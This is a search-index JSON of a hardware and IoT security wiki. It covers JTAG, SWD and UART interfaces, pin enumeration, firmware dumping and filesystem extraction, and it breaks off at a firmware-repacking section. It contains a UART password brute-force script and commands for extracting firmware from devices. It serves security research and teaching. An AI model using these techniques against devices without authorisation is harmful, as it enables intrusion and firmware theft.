HardwareAllTheThings/search/search_index.json

{"config":{"lang":["en"],"separator":"[\\s\\-]+","pipeline":["stopWordFilter"]},"docs":[{"location":"","title":"\ud83d\udd0c Hardware All The Things","text":""},{"location":"#welcome-to-the-hardware-wiki","title":"Welcome to the Hardware wiki!","text":"<p>Welcome to our comprehensive Hardware Security Wiki, a curated collection of valuable payloads and bypass techniques tailored for Hardware and IoT Security. This repository serves as a dynamic and collaborative space, encouraging contributions from security enthusiasts and professionals alike.</p> <p> </p> <p>Our goal is to foster a community-driven platform where individuals can share, learn, and enhance their skills in hardware and IoT security. Whether you are a seasoned security expert or just starting, this repository is designed to provide you with a wealth of knowledge and practical insights.</p> <p> The information in this repository is very dense; expect information overload.</p>"},{"location":"#contribute-and-collaborate","title":"Contribute and Collaborate","text":"<p>We believe in the power of community and collective knowledge. Therefore, we warmly invite you to contribute your unique payloads, bypass techniques, and innovative strategies to enrich our repository. Your contributions help keep this project alive and kicking, ensuring that we can continue to bring you the latest and greatest in hardware and IoT security.</p> <p> </p> <p>You can also share the project and contribute with a GitHub Sponsorship.</p>"},{"location":"debug-interfaces/jtag/","title":"JTAG","text":""},{"location":"debug-interfaces/jtag/#summary","title":"Summary","text":"<ul> <li>JTAG Pins</li> <li>JTAGEnum</li> <li>References</li> </ul>"},{"location":"debug-interfaces/jtag/#jtag-pins","title":"JTAG Pins","text":"<p>Allows testing, debugging, firmware manipulation and boundary scanning.</p> <p>TCK: Test Clock. The drummer, or metronome, that dictates the speed of the TAP controller. 
Voltage on this pin simply pulses up and down in a rhythmic, steady beat. On every \u201cbeat\u201d of the clock, the TAP controller takes a single action. The actual clock speed is not specified in the JTAG standard; the TAP controller accepts whatever speed the outside device controlling JTAG drives.</p> <p>TMS: Test Mode Select. Voltages on the Mode Select pin control what action JTAG takes. By manipulating the voltage on this pin, you tell JTAG what you want it to do.</p> <p>TDI: Test Data-In. The pin that feeds data into the chip. The JTAG standard does not define protocols for communication over this pin; that is left up to the manufacturer. As far as JTAG is concerned, this pin is simply an ingress method for 1s and 0s to get into the chip. What the chip does with them is irrelevant to JTAG.</p> <p>TDO: Test Data-Out. The pin for data coming out of the chip. Like the Data-In pin, communication protocols are not defined by JTAG.</p> <p>TRST: Test Reset (Optional). This optional signal is used to reset JTAG to a known good state; we'll explain why this is optional in a few paragraphs.</p> <p>AVR has lock bits that protect the device from flash extraction.</p> <ul> <li>Clearing these lock bits erases the entire device (chip erase)</li> <li>If they are set, you\u2019re out of luck: try to get the firmware from other sources</li> </ul> <pre><code># Read fuses and lock bits using avarice -r\n$ avarice --program --file test.elf --part atmega128 --jtag /dev/ttyUSB0 :4444\n# Acquire firmware using avrdude\n$ avrdude -p m128 -c jtagmkI -P /dev/ttyUSB0 -U flash:r:\"/home/avr/flash.bin\":r\n</code></pre>"},{"location":"debug-interfaces/jtag/#enumeration-methods","title":"Enumeration methods","text":"<p>For enumeration methods see Enumeration/JTAG</p>"},{"location":"debug-interfaces/jtag/#references","title":"References","text":"<ul> <li>JTAGulator vs. 
JTAGenum, Tools for Identifying JTAG Pins in IoT Devices by Dylan Ayrey</li> <li>JTAG PIN Identification - February 21, 2017</li> <li>Hardware Debugging for Reverse Engineers Part 2: JTAG, SSDs and Firmware Extraction - Posted Apr 2, 2020 by wrongbaud</li> </ul>"},{"location":"debug-interfaces/swd/","title":"SWD","text":""},{"location":"debug-interfaces/swd/#summary","title":"Summary","text":"<ul> <li>SWD Pins</li> </ul>"},{"location":"debug-interfaces/swd/#swd-pins","title":"SWD pins","text":"<ul> <li>SWCLK: Clock into the core</li> <li>SWDIO: Data in / out</li> </ul> <p>JTAG and SWD are similar and share the same physical pins:</p> <table> <tr><th>JTAG Mode</th><th>SWD Mode</th><th>Signal</th></tr> <tr><td>TCK</td><td>SWCLK</td><td>Clock into the core</td></tr> <tr><td>TDI</td><td>-</td><td>JTAG test data input</td></tr> <tr><td>TDO</td><td>SWV</td><td>JTAG test data output / SWV trace data output</td></tr> <tr><td>TMS</td><td>SWDIO</td><td>JTAG test mode select / SWD data in and out</td></tr> <tr><td>GND</td><td>GND</td><td>-</td></tr> </table>"},{"location":"debug-interfaces/swd/#references","title":"References","text":"<ul> <li>Hardware Debugging for Reverse Engineers Part 1: SWD, OpenOCD and Xbox One Controllers - Posted Jan 30, 2020 by wrongbaud</li> </ul>"},{"location":"debug-interfaces/uart/","title":"UART","text":""},{"location":"debug-interfaces/uart/#what-is-it","title":"What is it?","text":"<p>UART stands for Universal Asynchronous Receiver-Transmitter. It is used for serial communication over a computer or peripheral device serial port.</p> <p>UART peripherals are commonly integrated into many embedded devices. Since there is no clock line, both sides rely on an agreed baud rate to stay synchronized. 
The baud rate is the rate at which information is transferred in a communication channel.</p> <p>With access to the UART, a user can see the bootloader and operating system logs.</p> <p>Generally, the line is held high (at a logical 1 value) while the UART is idle.</p> <p>The most common configuration is called 8N1: eight data bits, no parity, and 1 stop bit.</p>"},{"location":"debug-interfaces/uart/#identifying-uart-ports","title":"Identifying UART ports","text":"<p>A UART pinout has four ports:</p> <ul> <li>TX (Transmit)</li> <li>RX (Receive)</li> <li>VCC (Voltage)</li> <li>GND (Ground)</li> </ul> <p></p> <p>To find the UART there are multiple approaches:</p> <ul> <li>Search the Internet</li> <li>Check the PCB for pin labels</li> <li>Find likely candidates<ul> <li>Using a multimeter</li> <li>Using a logic analyzer</li> </ul> </li> <li>Follow PCB traces (almost always impossible)</li> </ul> <p>Keep in mind that some devices emulate UART ports by programming General-Purpose Input/Output (GPIO) pins if there isn't enough space on the board for dedicated hardware UART pins.</p> <p>It is advised to sample the communication at 4 times the baud rate, to avoid decoding issues.</p>"},{"location":"debug-interfaces/uart/#using-a-multimeter","title":"Using a multimeter","text":""},{"location":"debug-interfaces/uart/#gnr-pin","title":"GNR pin","text":"<p>First, identify the GND pin by using the multimeter in continuity mode.</p> <p>Place the black probe on any grounded metallic surface, whether it is part of the tested PCB or not. Then place the red probe on each of the ports. When you hear a beep, you've found a GND pin.</p>"},{"location":"debug-interfaces/uart/#vcc-pin","title":"VCC pin","text":"<p>Turn the multimeter to DC voltage mode and set it to the 20V range. Keep the black probe on a grounded surface. 
Place the red probe on a suspected pin and turn on the device.</p> <p>If the multimeter measures a constant voltage of either 3.3V or 5V, you've found the VCC pin.</p>"},{"location":"debug-interfaces/uart/#tx-pin","title":"TX pin","text":"<p>Keep the multimeter in DC voltage mode at the 20V range or less, and leave the black probe on a grounded surface. Move the red probe to the suspected pin and power cycle the device. If the voltage fluctuates for a few seconds and then stabilizes at the VCC value, you've most likely found the TX pin.</p> <p>This behavior happens because, during bootup, the device sends serial data through the TX pin for debugging purposes. Once it finishes booting, the UART line goes idle.</p>"},{"location":"debug-interfaces/uart/#rx-pin","title":"Rx pin","text":"<p>If you've already identified the rest of the UART pins, the nearby fourth pin is most likely the RX pin.</p> <p>Otherwise, you can identify it because it has the lowest voltage fluctuation and the lowest overall value of all the UART pins.</p>"},{"location":"debug-interfaces/uart/#using-a-logic-analyzer","title":"Using a logic analyzer","text":"<p>A logic analyzer is an electronic instrument that captures and displays multiple signals from a digital system or digital circuit.</p> <p>To find the UART pins we will connect the candidate pins to a logic analyzer and look for data being transmitted.</p>"},{"location":"debug-interfaces/uart/#hardware-setup","title":"Hardware setup","text":"<p>Make sure any system you're testing is powered off when you connect the logic analyzer's probes to it, to avoid short-circuiting.</p> <ul> <li>Connect the suspected TX pin to any channel of the logic analyzer.</li> <li>Connect one of your logic analyzer's GND pins to a GND pin of the PCB you're testing so they share a common ground.</li> </ul>"},{"location":"debug-interfaces/uart/#software-setup","title":"Software setup","text":""},{"location":"debug-interfaces/uart/#pulseview-sigrok","title":"PulseView / 
Sigrok","text":"<p> To make PulseView work on a Windows host, you have to install the WinUSB driver with Zadig: https://zadig.akeo.ie/</p> <ul> <li>Click Run in the top left corner to start the capture</li> <li>Once you get UART communication, you can add a \"protocol decoder\"</li> </ul> <p></p> <ul> <li>Select the right channel for TX and RX</li> <li>Select the baud rate, parity bit, and frame size (most commonly 8N1)</li> <li>Select the data format, for example \"ascii\" if ASCII characters are expected (boot sequence, stack trace, etc.)</li> </ul> <p>Once you get an interesting capture, you can save it and decode it with sigrok-cli instead of the PulseView GUI:</p> <pre><code>sigrok-cli -O ascii -i ./uart.sr -P uart:baudrate=115200:rx=D0 -B uart=rx\n</code></pre> <p></p>"},{"location":"debug-interfaces/uart/#saleae-based-logic-analyzer","title":"Saleae-based logic analyzer","text":"<p>This setup is for Saleae-based logic analyzers; if you use a different one, refer to the manufacturer's documentation.</p> <ul> <li>Open the Saleae software</li> <li>Create a new analyzer entry by pressing the plus (+) icon and selecting Async Serial (this is for UART).</li> <li>Select a serial channel (8 channels on the Logic analyzer) and keep the default settings.</li> <li>Try the popular baud rates used in IoT devices (9600, 19200, 38400, 57600, 115200). 
Note that when you don't know the bit rate, you can select \"Use Autobaud\" and let the software work its magic.</li> <li>Save the configuration.</li> </ul> <p>If you want to modify the sample rate and the duration:</p> <ul> <li>As a rule, you should sample digital signals at least four times faster than their bandwidth.</li> <li>With serial communications, which are generally very slow, a 50 kS/s sampling rate is more than enough, although sampling faster than this does no harm.</li> <li>As for the duration, 20 seconds is enough time for the device to power on and start transmitting data.</li> </ul> <p>Now try the popular baud rates on both suspected pins and compare the results. If you find readable text on one of the pins and the text makes sense, that\u2019s the TX pin.</p> <p></p> <p></p>"},{"location":"debug-interfaces/uart/#connect-to-serial-port","title":"Connect to serial port","text":""},{"location":"debug-interfaces/uart/#warning","title":"WARNING","text":"<p>It's not a big deal if you confuse the UART RX and TX ports with each other, because you can easily swap the wires connecting to them without any consequences. But confusing VCC with GND and connecting wires to them incorrectly might fry the circuit.</p>"},{"location":"debug-interfaces/uart/#examples","title":"Examples","text":""},{"location":"debug-interfaces/uart/#connection-using-a-usb-to-ttl","title":"Connection using a USB to TTL","text":"<p>Once the ports are connected, plug the adapter into your computer. You now need to find the device file. To do that, enter the following command: <code>sudo dmesg</code>.</p> <p>Typically, it will be assigned to <code>/dev/ttyUSB0</code> if you don't have any other peripheral devices attached.</p> <p>Under Ubuntu or Debian, a non-root user cannot access serial ports such as ttyS0 or ttyUSB0 unless they are a member of the dialout group! The equivalent group on Arch-based distributions is uucp. 
In other words, you just have to add yourself to this group to gain access (log out and back in for the change to apply).</p> <ul> <li>Ubuntu or Debian: <code>sudo usermod -a -G dialout $USER</code></li> <li>Arch-based: <code>sudo usermod -a -G uucp $USER</code></li> </ul>"},{"location":"debug-interfaces/uart/#detect-the-baud-rate","title":"Detect the baud rate","text":""},{"location":"debug-interfaces/uart/#most-common-baud-rate","title":"Most common baud rate","text":"<p>The most common baud rates for UART are <code>9600</code>, <code>19200</code>, <code>38400</code>, <code>57600</code> and <code>115200</code>.</p> <p>A table of other, less common baud rates can be found here.</p>"},{"location":"debug-interfaces/uart/#autodetect-the-baud-rate-using-a-script","title":"Autodetect the baud rate using a script","text":"<ul> <li>devttys0/baudrate.py</li> </ul> <pre><code># Download the script\nwget https://raw.githubusercontent.com/devttys0/baudrate/master/baudrate.py\n\n# Install the pyserial dependency (the PyPI package \"serial\" is a different, unrelated project)\npip2.7 install pyserial\n\n# Run the script on \"/dev/ttyUSB0\"\npython2.7 baudrate.py -p /dev/ttyUSB0\n</code></pre>"},{"location":"debug-interfaces/uart/#using-pulseview","title":"Using PulseView","text":"<p>It is possible to derive the baud rate from the duration of one bit period, using PulseView or any other bus analysis tool:</p> <p></p> <pre><code># https://www.cuemath.com/frequency-formula/\n# baud rate = 1 / bit period\n&gt;&gt;&gt; 1/8.003e-6 \n124953.14257153569\n</code></pre> <p>The closest common baud rate is 115200. 
Configure the decoder and you should see ASCII characters:</p> <p></p>"},{"location":"debug-interfaces/uart/#interact-with-uart","title":"Interact with UART","text":"<ul> <li> <p>Command line tools to interact with UART:</p> <pre><code>cu -l /dev/ttyUSB0 -s 115200\nmicrocom -d -s 115200 -p /dev/ttyUSB0\nminicom -b 115200 -o -D /dev/ttyUSB0\nscreen /dev/ttyUSB0 115200 # To exit GNU screen, type Control-A k\n</code></pre> </li> <li> <p>Brute force a password protected UART:</p> <pre><code>import serial, time\nport = \"/dev/ttyUSB0\"\nbaud = 115200\n# timeout so readline() returns even when the target stays silent\ns = serial.Serial(port, baud, timeout=2)\n\nwith open('/home/audit/Documents/IOT/passwords.lst', 'r') as f:\n    lines = f.readlines()\n\nfor pwd in lines:\n    pwd = pwd.strip()\n    # pyserial expects bytes; the prompt expects a line terminator\n    a = s.write((pwd + \"\\n\").encode())\n    print(\"Pwd: {}\".format(pwd))\n    print(\"Sent {} bytes\".format(a))\n    print(\"Result: {}\".format(s.readline()))\n    time.sleep(10)\n</code></pre> </li> <li> <p>Interact with HydraBus</p> <pre><code>uart1&gt; scan\nuart1&gt; show\nuart1&gt; speed 38400\nuart1&gt; bridge\n</code></pre> </li> </ul>"},{"location":"debug-interfaces/uart/#uart-over-ble","title":"UART over BLE","text":"<p>It\u2019s an emulation of a serial port over BLE. The UUID of the Nordic UART Service is <code>6E400001-B5A3-F393-E0A9-E50E24DCCA9E</code>. This service exposes two characteristics: one for transmitting and one for receiving.</p> <ul> <li>RX Characteristic (UUID: 6E400002-B5A3-F393-E0A9-E50E24DCCA9E):<ul> <li>The peer can send data to the device by writing to the RX Characteristic of the service. ATT Write Request or ATT Write Command can be used. The received data is sent on the UART interface.</li> </ul> </li> <li>TX Characteristic (UUID: 6E400003-B5A3-F393-E0A9-E50E24DCCA9E):<ul> <li>If the peer has enabled notifications for the TX Characteristic, the application can send data to the peer as notifications. 
The application will transmit all data received over UART as notifications.</li> </ul> </li> </ul>"},{"location":"debug-interfaces/uart/#references","title":"References","text":"<ul> <li>nRF UART 2.0 - Nordic Semiconductor ASA</li> <li>UART/Serial Port Emulation over BLE</li> <li>UART Over Bluetooth Low Energy</li> <li>https://makecode.microbit.org/v1/98535-28913-33692-07418</li> <li>Using the micro:bit Bluetooth Low Energy UART (serial over Bluetooth)</li> </ul>"},{"location":"enumeration/chip-identification/","title":"Chip identification","text":"<ul> <li>Google dork: <code>filetype:pdf &lt;reference number&gt;</code></li> <li>https://datasheetspdf.com</li> <li>https://www.alldatasheet.com</li> <li>https://www.datasheets360.com</li> </ul>"},{"location":"enumeration/chip-identification/#emrf-shield","title":"EM/RF shield","text":"<p>An Electromagnetic/Radio Frequency shield should be removed to see what it is hiding.</p>"},{"location":"enumeration/fcc-id/","title":"FCC ID","text":""},{"location":"enumeration/fcc-id/#searchable-fcc-id-database","title":"Searchable FCC ID Database","text":"<p>An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.</p> <ul> <li>fccid.io</li> </ul> <p>For legal sale of wireless devices in the US, manufacturers must:</p> <ul> <li>Have the device evaluated by an independent lab to ensure it conforms to FCC standards</li> <li>Provide documentation to the FCC of the lab results</li> <li>Provide User Manuals, Documentation, and Photos relating to the device</li> <li>Digitally or physically label the device with the unique identifier provided by the FCC (upon approved application)</li> </ul>"},{"location":"enumeration/jtag/","title":"JTAG","text":"<p>Sometimes when you have no idea what the pinout of the JTAG port is, you have to find a way to correctly identify each of the JTAG pins. 
There are a few ways to do that; one of them is by \"brute-forcing\" the pins with the <code>IDCODE</code> or <code>BYPASS</code> JTAG instructions.</p> <p>There are several tools and ways to enumerate JTAG pins. Here are a few:</p> <ul> <li>Probing pin voltage and resistance to VCC and GND (TODO)</li> <li>Searching with Joe Grand's JTAGulator (TODO)</li> <li>Using an Arduino Pro Micro</li> <li>Using a Raspberry Pi Pico</li> </ul>"},{"location":"enumeration/jtag/#searching-jtag-pins-with-raspberry-pi-pico","title":"Searching JTAG pins with Raspberry PI Pico","text":"<ul> <li>Raspberry Pi Pico: https://github.com/racerxdl/JTAGscan, made by szymonh and adapted to the RP2040 by racerxdl</li> </ul>"},{"location":"enumeration/jtag/#how-does-it-work","title":"How does it work?","text":"<p>JTAGscan iterates over all defined pins (currently, for the RP2040, the first 16 pins) searching for TMS, TCK, TDO and TDI.</p> <p>It has two approaches:</p> <ul> <li>Try reading <code>IDCODE</code> - Only requires TMS, TCK and TDO, so it's faster. Unfortunately not all devices support the <code>IDCODE</code> instruction (although most of them do). This doesn't find the TDI pin.</li> <li>Shifting bits in <code>BYPASS</code> mode. This can find all pins, but it is slower (since not only do you have one more pin to iterate over, but you also need to shift \"enough\" bits through the JTAG chain).</li> </ul>"},{"location":"enumeration/jtag/#hardware-suggestions","title":"Hardware suggestions","text":"<p>Any Raspberry Pi Pico board should work fine for scanning JTAG ports. Make sure you check the VCC of the target to see if it is 3.3V. 
Any other voltage level will require a level shifter to avoid damage.</p> <p>It is also recommended to put a 33 Ohm resistor in series with every tested pin to avoid short-circuiting if a pin you're testing is an output.</p> <p></p>"},{"location":"enumeration/jtag/#programming-the-pipico","title":"Programming the PiPico","text":"<ol> <li>Go to <code>Releases</code> and download the <code>jtagscan-xxxx.zip</code></li> <li>Extract the zip file to get the <code>uf2</code> file</li> <li>Plug your Raspberry Pi Pico into the USB port while pressing the BOOTSEL button (to enter the bootloader)</li> <li>A new \"disk\" should appear on your machine. Drag the <code>uf2</code> file to the disk</li> <li>The Raspberry Pi Pico should reboot and be recognized as a USB-serial converter</li> </ol>"},{"location":"enumeration/jtag/#using","title":"Using","text":"<p>Open the detected serial port in your favorite serial terminal application (for example, PuTTY).</p> <p>Hit the key <code>h</code> to show the help.</p> <pre><code>+-------------------------------+\n| JTAGscan Jtag Pinout Finder |\n+-------------------------------+\n a - Automatically find all pins\n i - IDCODE search for pins\n b - BYPASS search for pins\n t - TDI-only BYPASS search\n m - set pin mask, current: 0xFFFF\n d - set debug level: 1\n c - half cycle us, current: 32\n h - print this help\n+-------------------------------+\n</code></pre> <p>Hit <code>a</code> to scan the JTAG pins. This will first do an <code>IDCODE</code> scan and then a <code>BYPASS</code> scan. Depending on how many pins are in the <code>pin mask</code> field (you can change it with <code>m</code>) it may take a while. 
On success, the scanner will stop with a message like this one:</p> <pre><code> Automatically searching\n+-- Starting with IDCODE scan --+\n| TCK | TMS | TDO | IDCODE |\n+-------------------------------+\n| 2 | 3 | 0 | cba00477 |\n+----------- SUCCESS -----------+\n TCK, TMS, and TDO found.\n\n+-- BYPASS searching, just TDI -+\n| TCK | TMS | TDO | TDI | Width |\n+-------------------------------+\n| 2 | 3 | 0 | 1 | 31 |\n+----------- SUCCESS -----------+\n</code></pre>"},{"location":"enumeration/jtag/#jtagenum-with-arduino-or-raspberry-pi","title":"JTAGEnum with Arduino or Raspberry Pi","text":"<p>JTAGenum is an open source scanner available as an Arduino sketch (JTAGenum.ino) or a Raspberry Pi shell script (JTAGenum.sh, experimental). This code was built with three primary goals:</p> <ul> <li>Given a large set of pins on a device, determine which are JTAG lines</li> <li>Enumerate the Instruction Register to find undocumented functionality</li> </ul> <p>\u26a0\ufe0f The JTAG adapter and the device must share the same ground.</p> <p>Software connection setup:</p> <ul> <li>Download the INO sketch from GitHub</li> <li>Open the Arduino IDE and load the downloaded JTAGEnum sketch</li> <li>Choose the correct Serial Port and Board</li> <li>Compile and upload the sketch</li> <li>Open the Serial Monitor</li> <li>Set the correct baud rate</li> <li>Enter the command to scan (\"s\")</li> </ul> <p>Arduino PIN Layout</p> <ul> <li>Digital PIN 2 (Black)</li> <li>Digital PIN 3 (White)</li> <li>Digital PIN 4 (Grey)</li> <li>Digital PIN 5 (Maroon)</li> <li>Digital PIN 6 (Blue)</li> <li>GND - GREEN</li> </ul> <p></p>"},{"location":"enumeration/jtag/#references","title":"References","text":"<ul> <li>JTAGulator vs. 
JTAGenum, Tools for Identifying JTAG Pins in IoT Devices by Dylan Ayrey</li> <li>JTAG PIN Identification - February 21, 2017</li> <li>Hardware Debugging for Reverse Engineers Part 2: JTAG, SSDs and Firmware Extraction - Posted Apr 2, 2020 by wrongbaud</li> </ul>"},{"location":"firmware/firmware-dumping/","title":"Firmware Dumping","text":""},{"location":"firmware/firmware-dumping/#flash-memory-types","title":"Flash Memory Types","text":"<ul> <li>NOR Flash (SOIC8 package)<ul> <li>SPI Flash</li> <li>Mostly error-free (\"fault-free\") memory</li> <li>Used for embedded devices that need fast execution but low storage capacity</li> </ul> </li> <li>NAND Flash (TSOP48 package)</li> <li>eMMC Flash (BGA{153} package)</li> <li>UFS Universal Flash Storage</li> </ul>"},{"location":"firmware/firmware-dumping/#flash-a-new-firmware-into-the-microcontroller","title":"Flash a new firmware into the microcontroller","text":"<ul> <li> <p>Using avrdudes/avrdude <pre><code># send raw data firmware\n$ avrdude -p m328p -c usbasp -P /dev/ttyUSB0 -b 9600 -U flash:w:flash_raw.bin\n\n# send ihex firmware\n$ avrdude -c arduino -p atmega328p -P /dev/ttyUSB* -b115200 -u -V -U flash:w:CHALLENGE.hex\n# read the flash back as ihex (\":i\") to verify what is on the chip\n$ avrdude -c usbasp -p m328p -F -U flash:r:dump.hex:i\n\n# default\n$ avrdude -c usbasp -p m328p -C /etc/avrdude.conf -U flash:w:hardcodedPassword.ino.arduino_standard.hex\n</code></pre></p> </li> <li> <p>Using raspberrypi/picotool <pre><code># extension indicates the type (bin, uf2)\npicotool load firmware.bin\n</code></pre></p> </li> </ul>"},{"location":"firmware/firmware-dumping/#dump-flash-using-debug-port","title":"Dump flash using debug port","text":"<ul> <li> <p>Using avrdudes/avrdude <pre><code>$ avrdude -p m328p -c usbasp -P /dev/ttyUSB0 -b 9600 -U flash:r:flash_raw.bin:r\n$ avrdude -p m328p -c arduino -P /dev/ttyACM0 -b 115200 -U flash:r:flash_raw.bin:r\n$ avrdude -p atmega328p -c arduino -P/dev/ttyACM0 -b 115200 -D -U flash:r:program.bin:r -F -v\n</code></pre></p> </li> <li> <p>Using 
openocd-org/openocd</p> <ul> <li>Determine the code space of the microcontroller (for example nRF51822 - Micro:bit) and save the following as <code>dump_fw.cfg</code>: <pre><code>init\nreset init\nhalt\n# dump_image &lt;file&gt; &lt;start address&gt; &lt;size&gt;\ndump_image image.bin 0x00000000 0x00040000\nexit\n</code></pre></li> <li>Dump with openocd <pre><code>sudo openocd -f /home/maki/tools/hardware/openocd/tcl/interface/stlink-v2-1.cfg -f /home/maki/tools/hardware/openocd/tcl/target/nrf51.cfg -f dump_fw.cfg\n</code></pre></li> </ul> </li> <li> <p>Using raspberrypi/picotool</p> <ul> <li>Build picotool; you will need the pico-sdk <pre><code># PicoSDK\ngit clone https://github.com/raspberrypi/pico-sdk.git\ncd pico-sdk\ngit submodule update --init\n\n# Picotool (cloned next to pico-sdk, so the SDK is two levels up from build/)\ncd ..\ngit clone https://github.com/raspberrypi/picotool.git\ncd picotool\nmkdir build\ncd build\ncmake -DPICO_SDK_PATH=../../pico-sdk ..\nmake\n</code></pre></li> <li>Dump the program or the whole flash memory <pre><code>sudo ./picotool save -F /tmp/out.bin\nSaving file: [==============================] 100%\nWrote 73312 bytes to /tmp/out.bin\n\nsudo ./picotool save --all -F /tmp/out2.bin\nSaving file: [==============================] 100%\nWrote 2097152 bytes to /tmp/out2.bin\n</code></pre></li> </ul> </li> </ul>"},{"location":"firmware/firmware-dumping/#dump-flash-via-spi","title":"Dump Flash via SPI","text":"<ul> <li> <p>Using flashrom/flashrom <pre><code>sudo apt-get install build-essential pciutils usbutils libpci-dev libusb-dev libftdi1 libftdi-dev zlib1g-dev subversion libusb-1.0-0-dev\nsvn co svn://flashrom.org/flashrom/trunk flashrom\ncd flashrom\nmake\n\nflashrom -p ft2232_spi:type=232H -r spidump.bin\nflashrom -p linux_spi:dev=/dev/spidev0.0,spispeed=512 -r spi_dump.bin\nflashrom -p serprog:dev=/dev/ttyACM0,spispeed=160k -r dump_spi.bin -c \"MX25L6406E/MX25L6408E\"\n</code></pre></p> </li> <li> <p>Using HydraBus: hydrabus/hydrafw/hydra_spi_dump.py <pre><code>./hydra_spi_dump.py firmware.bin 1024 0x000000 fast\n</code></pre></p> </li> 
</ul>"},{"location":"firmware/firmware-dumping/#convert-ihex-to-elf","title":"Convert ihex to elf","text":"<p>Intel HEX is a transitional file format for microcontrollers, (E)PROMs, and other devices. The documentation states that HEX files can be converted to binary files and programmed into a configuration device.</p> <p>Each line (record) in the ihex file consists of:</p> <ul> <li>a colon :</li> <li>followed by ONE BYTE = record length</li> <li>followed by TWO BYTES = offset to load</li> <li>followed by ONE BYTE = record type</li> <li>followed by the data bytes</li> <li>last BYTE in the line = checksum</li> </ul> <p>Convert a .hex (ihex format) to an .elf file with <code>avr-objcopy</code> or with the online tool http://matrixstorm.com</p> <pre><code>$ avr-objcopy -I ihex -O elf32-avr dump.hex dump.elf\n# or\n$ objcopy -I ihex chest.hex -O binary chest.bin ; xxd chest.bin\n</code></pre> <p>Alternative with Python <code>bincopy</code></p> <pre><code>import bincopy\nimport sys\n\nf = bincopy.BinFile()\nf.add_ihex_file(sys.argv[1])\nprint(f.as_binary())\n</code></pre> <p>Quick strings on .hex</p> <pre><code>cat defaultPassword.ino.arduino_standard.hex | tr -d \":\" | tr -d \"\\n\" | xxd -r -p | strings\n</code></pre> <p>Inspect the assembly with <code>avr-objdump -m avr -D chest.hex</code>. Emulate: <code>qemu-system-avr -S -s -nographic -serial tcp::5678,server=on,wait=off -machine uno -bios chest.bin</code></p>"},{"location":"firmware/firmware-dumping/#explore-filesystem","title":"Explore Filesystem","text":""},{"location":"firmware/firmware-dumping/#common-filesystem","title":"Common Filesystem","text":"<ul> <li>SquashFS : A compressed read-only filesystem commonly used in Linux-based firmware. 
It provides good flexibility because it supports writable overlay filesystems on top, allowing changes to be made at runtime.</li> <li>CramFS (Compressed ROM Filesystem) : Simple read-only filesystem that supports compression.</li> <li>ROMFS (Read-Only Memory Filesystem) : Simple filesystem that is strictly read-only and does not provide compression support.</li> <li>YAFFS/YAFFS2 (Yet Another Flash Filesystem) : This filesystem is specifically designed for NAND Flash memory. In particular, it incorporates ECC management for ensuring data integrity. Filesystem integrity is also maintained by storing metadata redundantly.</li> <li>JFFS/JFFS2 (Journalling Flash Filesystem) : This filesystem is also designed for NAND Flash memory. JFFS utilizes a journaling mechanism to track changes to the filesystem, ensuring data consistency and integrity even in the event of sudden power loss or system crashes. It also supports ECC.</li> <li>UBIFS (Unsorted Block Image Filesystem) : UBIFS is a successor to JFFS2 and is optimized for NAND flash memory. It offers improved performance, reliability, and scalability, with features such as compression, encryption, and fast mounting. UBIFS supports multiple partitions.</li> </ul> <table> <tr><th>Filesystem</th><th>RO/RW</th><th>Magic</th><th>Tool</th></tr> <tr><td>SquashFS</td><td>RO</td><td>sqsh, hsqs, qshs, sqsl</td><td>unsquashfs, 7zip</td></tr> <tr><td>JFFS(2)</td><td>RW</td><td>0x07C0 (v1), 0x72b6 (v2)</td><td>jefferson</td></tr> <tr><td>YAFFS(2)</td><td>RW</td><td>0x5941ff53</td><td>unyaffs</td></tr> <tr><td>CramFS</td><td>RO</td><td>0x28cd3d45</td><td>uncramfs, 7zip</td></tr> <tr><td>UBIFS</td><td>RW</td><td>0x06101831</td><td>ubi_reader</td></tr> <tr><td>RomFS</td><td>RO</td><td>0x7275</td><td>/</td></tr> <tr><td>CPIO</td><td>RO</td><td>\"070707\"</td><td>cpio, 7zip</td></tr> </table>"},{"location":"firmware/firmware-dumping/#tools","title":"Tools","text":"<ul> <li> <p>unix/strings <pre><code>$ strings file.bin\n\n$ strings -e l file.bin\n# The strings -e flag specifies the encoding of the characters. -el specifies little-endian characters 16 bits wide (e.g. UTF-16)\n\n$ strings -tx file.bin\n# The -t flag will return the offset of the string within the file. 
-tx will return it in hex format, -to in octal and -td in decimal.\n</code></pre></p> </li> <li> <p>unix/dd <pre><code>$ dd if=firmware.bin of=firmware.chunk bs=1 skip=$((0x200)) count=$((0x400-0x200))\n# If we wanted to run it a little faster, we could increase the block size:\n$ dd if=firmware.bin of=firmware.chunk bs=$((0x100)) skip=$((0x200/0x100)) count=$(((0x400-0x200)/0x100))\n</code></pre></p> </li> <li> <p>ReFirmLabs/binwalk <pre><code>$ binwalk -Me file.bin\n$ binwalk -Y dump.elf\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n3708 0xE7C ARM executable code, 16-bit (Thumb), little endian, at least 522 valid instructions\n</code></pre></p> </li> <li> <p>onekey-sec/unblob <pre><code>docker run --rm --pull always -v /path/to/extract-dir/on/host:/data/output -v /path/to/files/on/host:/data/input ghcr.io/onekey-sec/unblob:latest /data/input/path/to/file\ndocker run --rm --pull always ghcr.io/onekey-sec/unblob:latest --help\n</code></pre></p> </li> <li> <p>squashfs-tools/unsquashfs <pre><code>sudo unsquashfs -f -d /media/seagate /tmp/file.squashfs\n</code></pre></p> </li> <li> <p>onekey-sec/jefferson - JFFS2 filesystem extraction tool <pre><code>pip install jefferson\njefferson filesystem.img -d outdir\njefferson file.jffs2 -d jffs2\n</code></pre></p> </li> <li> <p>whataday/unyaffs - YAFFS2 filesystem extraction tool <pre><code>unyaffs [-l &lt;layout&gt;] [-t] [-v] [-V] &lt;image_file_name&gt; [&lt;base dir&gt;]\n -l &lt;layout&gt; set flash memory layout\n layout=0: detect chunk and spare size (default)\n layout=1: 2K chunk, 64 byte spare size\n layout=2: 4K chunk, 128 byte spare size\n layout=3: 8K chunk, 256 byte spare size\n layout=4: 16K chunk, 512 byte spare size\n -t list image contents\n -v verbose output\n -V print version\n</code></pre></p> </li> </ul>"},{"location":"firmware/firmware-dumping/#write-new-firmware","title":"Write new firmware","text":"<ul> <li> <p>Repack firmware 
